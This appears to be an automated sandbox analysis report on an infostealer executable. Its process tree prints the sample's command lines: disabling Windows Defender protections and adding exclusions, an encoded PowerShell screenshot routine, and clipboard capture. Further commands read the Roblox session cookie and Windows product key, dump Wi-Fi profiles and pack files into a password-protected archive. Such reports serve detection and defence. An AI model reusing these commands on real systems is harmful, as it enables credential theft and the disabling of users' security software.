Analysis

  • max time kernel
    91s
  • max time network
    95s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12-11-2024 03:31

General

  • Target

    Windows.exe

  • Size

    7.5MB

  • MD5

    ee2762b212acc2cd4aecd9db7a1edfc3

  • SHA1

    799a58685ad4658f40d3c3cc0df71cb2b066c3e4

  • SHA256

    debf6e8f7597a647d84399460f43fc0c8b9948f9530e4364b4964a4a088a3ea9

  • SHA512

    12f55beaff5ac14ae2e10d20eb986225f18820e075ff588e023d34ade3afb7eea6ab3e200e08484e3a94964ec963e719766aef6e7eb36559566ed0cc8390bb69

  • SSDEEP

    196608:p3unqZewfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oSQ:MuIH2XgHq+jq93YoN

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Windows.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:6036
    • C:\Users\Admin\AppData\Local\Temp\Windows.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3464
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3864
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3772
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4092
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‏‏.scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‏‏.scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1212
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4304
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2296
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5304
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1236
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:5544
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1028
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5644
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4356
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1056
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:688
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:1948
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3316
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:2984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3604
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5124
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wcowvklw\wcowvklw.cmdline"
              5⤵
                PID:6024
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF0A.tmp" "c:\Users\Admin\AppData\Local\Temp\wcowvklw\CSC9DC241FAB6214FA8A71B34AB658FB224.TMP"
                  6⤵
                    PID:2928
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:6016
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:2748
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1388
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3780
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2252
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4600
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3552
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2504
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:236
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:2672
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:4628
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5524
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:1972
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1700
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:1180
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:2440
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI60362\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\hVqqh.zip" *"
                                    3⤵
                                      PID:2104
                                      • C:\Users\Admin\AppData\Local\Temp\_MEI60362\rar.exe
                                        C:\Users\Admin\AppData\Local\Temp\_MEI60362\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\hVqqh.zip" *
                                        4⤵
                                        • Executes dropped EXE
                                        PID:2396
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                      3⤵
                                        PID:3344
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic os get Caption
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2116
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                        3⤵
                                          PID:220
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get totalphysicalmemory
                                            4⤵
                                              PID:4728
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                            3⤵
                                              PID:5256
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic csproduct get uuid
                                                4⤵
                                                  PID:4192
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:4632
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4132
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:2540
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      4⤵
                                                      • Detects videocard installed
                                                      PID:1236
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                    3⤵
                                                      PID:2052
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:6004

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  3KB

                                                  MD5

                                                  74e4a39ae145a98de20041613220dfed

                                                  SHA1

                                                  ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

                                                  SHA256

                                                  2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

                                                  SHA512

                                                  96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                                                  SHA1

                                                  9910190edfaccece1dfcc1d92e357772f5dae8f7

                                                  SHA256

                                                  0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                                                  SHA512

                                                  5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  45f53352160cf0903c729c35c8edfdce

                                                  SHA1

                                                  b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab

                                                  SHA256

                                                  9cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2

                                                  SHA512

                                                  e3fa27a80a1df58acb49106c306dab22e5ed582f6b0cd7d9c3ef0a85e9f5919333257e88aa44f42a0e095fd577c9e12a02957a7845c0d109f821f32d8d3343f3

